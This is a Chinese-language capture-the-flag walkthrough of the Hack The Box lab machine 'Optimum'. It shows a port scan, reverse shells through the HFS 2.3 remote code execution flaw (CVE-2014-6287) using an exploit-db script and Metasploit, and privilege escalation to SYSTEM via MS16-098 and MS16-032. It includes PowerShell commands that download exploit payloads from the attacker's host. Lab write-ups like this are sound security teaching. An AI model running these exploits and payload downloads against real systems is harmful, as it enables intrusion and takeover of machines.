Optimum
https://app.hackthebox.com/machines/6
受害者ip:10.10.10.8
攻击者ip:10.10.16.6
参考:https://0xdf.gitlab.io/2021/03/17/htb-optimum.html#ms16-032
https://medium.com/@toneemarqus/optimum-htb-manual-walkthrough-2023-tonee-e2a53fb59b1d
https://www.cnblogs.com/chengwenjun/p/16693574.html
端口扫描
发现只开启了80端口
nmap -sS -Pn -n --open --min-hostgroup 4 --min-parallelism 1024 --host-timeout 30 -T4 -v -p- 10.10.10.8
web页面发现是hfs框架,并且发现版本号是2.3
HFS(HTTP File Server)是一个基于HTTP协议的文件服务器软件,允许用户通过浏览器访问和共享计算机上的文件。HFS的起源可以追溯到2002年,由Rejetto开发并发布。
反弹shell1:py反弹
查找相关漏洞,发现存在CVE-2014-6287,rce
searchsploit hfs 2.3
cp /usr/share/exploitdb/exploits/windows/remote/49584.py ./
修改脚本ip
直接启动脚本,获得了用户optimum的shell
python3 49584.py
反弹shell2:msf反弹
search hfs 查找相关漏洞
use 1 使用exploit/windows/http/rejetto_hfs_exec
show options 查看设置
msf6 exploit(windows/http/rejetto_hfs_exec) > set rhosts 10.10.10.8 rhosts => 10.10.10.8 msf6 exploit(windows/http/rejetto_hfs_exec) > set srvhost 10.10.16.6 srvhost => 10.10.16.6 msf6 exploit(windows/http/rejetto_hfs_exec) > set srvport 5555 srvport => 5555 msf6 exploit(windows/http/rejetto_hfs_exec) > set lhost 10.10.16.6 lhost => 10.10.16.6 msf6 exploit(windows/http/rejetto_hfs_exec) > run
提权1
systeminfo查看主机信息
参考:https://blog.csdn.net/weixin_45650977/article/details/112554489
使用windows-exploit-suggester.py查看可能存在的漏洞
首次使用要安装xlrd1.2,获取信息库 python2 -m pip install xlrd==1.2.0python2 windows-exploit-suggester.py --update
将刚才靶机的systeminfo命令粘贴到txt中
python2 windows-exploit-suggester.py --database 2024-12-18-mssb.xls --systeminfo optimum.txt
利用ms16-098
由于49584.py获得的powershell执行exe没反应,换成39161.py
修改攻击ip和监听的端口
执行 python2 39161.py 10.10.10.8 80便可获得cmd的shell
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-098
上传bfill.exe
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.16.6/windows/MS16-098/bfill.exe', 'C:UserskostasDesktopbfill.exe')" powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.16.6/Invoke-MS16032.ps1', 'C:UserskostasDownloadsInvoke-MS16032.ps1')"
执行bfill.exe
提权2
bg挂到后台 search local_exploit_suggester扫描一下漏洞 use 0 show sessions set session 1 run
使用ms16_032提权
1exploit/windows/local/bypassuac_eventvwrYesThe target appears to be vulnerable. 2exploit/windows/local/bypassuac_sluihijackYesThe target appears to be vulnerable. 3exploit/windows/local/cve_2020_0787_bits_arbitrary_file_moveYesThe service is running, but could not be validated. Vulnerable Windows 8.1/Windows Server 2012 R2 build detected! 4exploit/windows/local/ms16_032_secondary_logon_handle_privescYesThe service is running, but could not be validated. 5exploit/windows/local/tokenmagic
运行ms16_032
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set session 1 session => 1 msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set lhost 10.10.16.6 lhost => 10.10.16.6 msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set lport 1111 lport => 1111 msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run
成功获得authoritysystem权限
原文始发于微信公众号(王之暴龙战神):Optimum
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论